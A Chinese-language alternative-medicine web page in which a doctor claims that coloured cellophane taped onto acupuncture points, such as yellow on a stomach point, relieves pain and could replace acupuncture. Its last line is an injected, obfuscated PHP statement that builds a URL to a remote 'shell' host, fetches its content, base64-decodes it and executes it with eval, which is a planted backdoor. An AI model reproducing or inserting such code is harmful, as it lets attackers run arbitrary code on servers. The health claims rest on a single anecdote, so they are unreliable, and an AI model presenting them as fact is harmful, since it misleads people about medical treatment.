收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 五顏六色也能治病
五顏六色也能治病 列印 E-mail
        喜歡「胡思亂想」的我,對於「五行」(木火土金水)相對應的「五色」(青赤黃白黑)一直存在著濃厚的興趣,心想如果人體的每個臟器分別有其屬性,那麼「顏色」應該也具有某種治療效果才對!心理學認為顏色對於情緒具影響力,如紅色使人興奮、熱情,綠色使人穩定…..,即是一個最明顯的例子。
        於是我到文具店購買小朋友做勞作用的那種玻璃紙──綠的、黃的、紅的,以及黑色和白色的壁報紙,分別剪成一小塊、一小塊,嘗試貼在病人病灶所屬的經脈上面。有一位女性病患來我這裡說她胃痛,中醫所謂「肚腹三里留」,所以我選擇足三里;而胃經屬於黃色,我便用了一枚黃色的玻璃紙貼在她的足三里上,不一會兒她告訴我說:「我的胃不痛了!」這對當時的我來說是很振奮的結果!以為可以返家的她把長裙蓋回去,才踏出診間沒幾步,竟然折回來說:「我的胃又開始痛了!」

        我突然想到,顏色是光的折射反應,長裙遮蓋了光線,黃色的可見光不見了,所以她的胃又痛了。我連忙讓她回到診間,請她再把裙擺拉至膝蓋高度,果然她的胃又不痛了。連續反覆數次都有同樣的效果,令我對「色療」法產生一探究竟的好奇心。

        經歷許多類似的色療臨床實證,結果讓我相當興奮,原來單用顏色治療就能收到很好的效果,五行五色與五臟六腑之間也的確是息息相關的!而使用在穴道上的效果,明顯比經絡上更好,如此豈不可以取代針灸嗎?可是伴隨而來的問題是,有沒有可以把「色療」效果發揮到更為極致的方法或者方便使用的材質?近年來,果然發展出用「光」作用在穴道上來為治療疾病的方法。
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));